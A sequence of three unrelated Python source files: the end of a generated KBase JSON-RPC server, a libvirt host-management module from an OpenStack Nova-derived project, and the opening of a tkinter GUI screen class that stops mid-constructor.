ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'NWChemKbase ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
import operator
import os
import socket
import threading
import eventlet
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from patron import context as patron_context
from patron import exception
from patron.i18n import _
from patron.i18n import _LE
from patron.i18n import _LI
from patron.i18n import _LW
from patron import rpc
from patron import utils
from patron.virt import event as virtevent
from patron.virt.libvirt import compat
from patron.virt.libvirt import config as vconfig
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
CONF = cfg.CONF
CONF.import_opt('host', 'patron.netconf')
CONF.import_opt('my_ip', 'patron.netconf')
class DomainJobInfo(object):
"""Information about libvirt background jobs
This class encapsulates information about libvirt
background jobs. It provides a mapping from either
the old virDomainGetJobInfo API which returned a
fixed list of fields, or the modern virDomainGetJobStats
which returns an extendable dict of fields.
"""
_have_job_stats = True
def __init__(self, **kwargs):
self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
self.time_elapsed = kwargs.get("time_elapsed", 0)
self.time_remaining = kwargs.get("time_remaining", 0)
self.downtime = kwargs.get("downtime", 0)
self.setup_time = kwargs.get("setup_time", 0)
self.data_total = kwargs.get("data_total", 0)
self.data_processed = kwargs.get("data_processed", 0)
self.data_remaining = kwargs.get("data_remaining", 0)
self.memory_total = kwargs.get("memory_total", 0)
self.memory_processed = kwargs.get("memory_processed", 0)
self.memory_remaining = kwargs.get("memory_remaining", 0)
self.memory_constant = kwargs.get("memory_constant", 0)
self.memory_normal = kwargs.get("memory_normal", 0)
self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
self.memory_bps = kwargs.get("memory_bps", 0)
self.disk_total = kwargs.get("disk_total", 0)
self.disk_processed = kwargs.get("disk_processed", 0)
self.disk_remaining = kwargs.get("disk_remaining", 0)
self.disk_bps = kwargs.get("disk_bps", 0)
self.comp_cache = kwargs.get("compression_cache", 0)
self.comp_bytes = kwargs.get("compression_bytes", 0)
self.comp_pages = kwargs.get("compression_pages", 0)
self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
self.comp_overflow = kwargs.get("compression_overflow", 0)
@classmethod
def _get_job_stats_compat(cls, dom):
# Make the old virDomainGetJobInfo method look similar to the
# modern virDomainGetJobStats method
try:
info = dom.jobInfo()
except libvirt.libvirtError as ex:
# When migration of a transient guest completes, the guest
# goes away so we'll see NO_DOMAIN error code
#
# When migration of a persistent guest completes, the guest
# merely shuts off, but libvirt unhelpfully raises an
# OPERATION_INVALID error code
#
# Lets pretend both of these mean success
if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job info: %s", ex)
raise
return cls(
type=info[0],
time_elapsed=info[1],
time_remaining=info[2],
data_total=info[3],
data_processed=info[4],
data_remaining=info[5],
memory_total=info[6],
memory_processed=info[7],
memory_remaining=info[8],
disk_total=info[9],
disk_processed=info[10],
disk_remaining=info[11])
@classmethod
def for_domain(cls, dom):
'''Get job info for the domain
Query the libvirt job info for the domain (ie progress
of migration, or snapshot operation)
Returns: a DomainJobInfo instance
'''
if cls._have_job_stats:
try:
stats = dom.jobStats()
return cls(**stats)
except libvirt.libvirtError as ex:
if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
# Remote libvirt doesn't support new API
LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
elif ex.get_error_code() in (
libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
# Transient guest finished migration, so it has gone
# away completely
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job stats: %s", ex)
raise
except AttributeError as ex:
# Local python binding doesn't support new API
LOG.debug("Missing local virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
else:
return cls._get_job_stats_compat(dom)
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
self._uri = uri
self._read_only = read_only
self._conn_event_handler = conn_event_handler
self._lifecycle_event_handler = lifecycle_event_handler
self._skip_list_all_domains = False
self._caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a Xen domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
if uri.find("xen://") != -1:
self._lifecycle_delay = 15
else:
self._lifecycle_delay = 0
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.PatronException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
if self._conn_event_handler is not None:
self._conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when a event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
if self._lifecycle_delay > 0:
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting, when runned with Xen
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
wrapped_conn = None
try:
wrapped_conn = self._connect(self._uri, self._read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = None
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
if self._conn_event_handler is not None:
self._conn_event_handler(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self._uri, 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(patron_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version, utils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
utils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an patron.objects.Instance object
Attempt to lookup the libvirt domain objects
corresponding to the Nova instance, based on
its name. If not found it will raise an
exception.InstanceNotFound exception. On other
errors, it will raise a exception.PatronException
exception.
:returns: a libvirt.Domain object
"""
return self._get_domain_by_name(instance.name)
def _get_domain_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant patron exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.PatronException(msg)
def _get_domain_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant patron exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.PatronException(msg)
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self.get_connection().listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self.get_connection().numOfDomains() > 0:
for id in self.get_connection().listDomainsID():
try:
dom = self._get_domain_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self.get_connection().listDefinedDomains():
try:
dom = self._get_domain_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for patron instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to patron instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info(_LI("Libvirt host capabilities %s"), xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self.get_connection().baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: " "%(error)s"),
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hostname,
'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.PatronException(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
usage_id: name of resource in secret
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.PatronException(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s' % xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a secret with XML: %s') % xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def get_domain_info(self, virt_dom):
return compat.get_domain_info(libvirt, self, virt_dom)
|
Screen4.py
|
import os
import threading
import tkinter.messagebox
import webbrowser
from tkinter import *
from tkinter import ttk, filedialog
from PIL import ImageTk, Image
from pdf2image import convert_from_path
from threading import *
class Card:
def __init__(self, path, label):
self.label = label
self.selected = False
self.path = path
class Screen4(Frame):
def __init__(self, window):
Frame.__init__(self, window)
self.count = 0
self.switch = False
self.x_option = 97
self.y_option = 209
self.drop_switch = False
self.row = 0
self.col = 0
self.images = []
self.cards = []
self.files = []
self.section = None
self.selected_cards = []
self.options = []
self.window = window
self.currIndex: None
self.window.configure(bg="#83568a")
self.canvas = Canvas(
self,
bg="#83568a",
height=1024,
width=1440,
bd=0,
highlightthickness=0,
relief="ridge")
self.canvas.place(x=0, y=0)
self.background_img = PhotoImage(file=f"resources/images/screen4/background.png")
self.background = self.canvas.create_image(
688.5, 86.0,
image=self.background_img)
self.img0 = PhotoImage(file=f"resources/images/screen4/img0.png")
self.b0 = Label(
image=self.img0,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b0.place (
x=-10, y=228,
width=339,
height=749)
